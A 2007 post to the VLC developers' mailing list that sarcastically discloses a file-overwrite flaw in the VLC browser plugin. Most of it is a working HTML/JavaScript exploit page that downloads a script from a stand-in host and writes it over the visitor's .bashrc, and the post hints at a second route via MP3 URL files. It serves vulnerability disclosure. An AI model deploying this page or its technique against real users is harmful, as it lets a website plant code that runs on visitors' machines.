[vlc-devel] Regarding "obscure" security problem

Rémi Denis-Courmont rdenis at simphalempin.com
Wed Dec 26 15:50:45 CET 2007


	Good news everyone!

As pointed out a LOOONG time ago by DamienF, a.k.a. ticket #1371:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head>
<title>VLC browser plugin file overwrite page</title>
</head>
<body>
<embed type="application/x-vlc-plugin" 
pluginspage="http://www.videolan.org"
       version="VideoLAN.VLCPlugin.2"
       width="640"
       height="480"
       id="vlc">
</embed>
<script type="text/javascript"><!--
  var vlc = document.getElementById("vlc");
  var src = "http://www.example.com/trojan.sh";
  var dst = ".bashrc";
  vlc.playlist.add (src, "File", ":demux=dump :demuxdump-file=" + dst);
  vlc.playlist.play ();
//!--></script>
</body>
</html>

I leave as an exercise to the reader to find out how to do the exact 
same thing using EXTVLCOPT inside a MP3 URL file.

Of course, I shall not fix this, otherwise I would further get on 
someone's nerves and in the way of usability. Instead, I'll simply run 
the following command and let every other VLC users screwed:
# sudo apt-get remove --purge mozilla-plugin-vlc

Thank you for your attention, I hope you are enjoying the end of the 
year at least as much as I do.

-- 
Rémi Denis-Courmont
feeling sarcastic for some reason



More information about the vlc-devel mailing list